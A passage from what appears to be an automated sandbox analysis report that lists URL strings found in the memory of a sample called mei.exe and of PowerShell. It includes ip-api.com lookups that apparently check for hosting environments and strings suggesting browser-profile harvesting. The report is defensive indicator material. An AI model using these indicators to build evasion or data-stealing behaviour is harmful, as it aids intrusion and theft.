              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: mei.exe, 00000001.00000003.1674817727.000002E913964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: mei.exe, 00000001.00000003.1788584216.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029359579.000002E9139B4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913E8A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913E8C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1785141429.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032296817.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913E8B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029764503.000002E9139B5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031403845.000002E9139B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: mei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000009.00000002.1743684934.000001BACE158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C14DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1830961000.000001E1B1461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: mei.exe, 00000001.00000002.2035788028.000002E9144F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000038.00000002.1830961000.000001E1B2A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: mei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eclipse.org/
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eclipse.org/0
              Source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eclipse.org/b
              Source: mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: mei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678406179.000002E913C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftTIMES~1.JSOy.O
              Source: mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftWARNST~1PMAy.O
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftXULSTO~1.JSOy.O
              Source: mei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: mei.exe, 00000001.00000002.2035981021.000002E914628000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: mei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
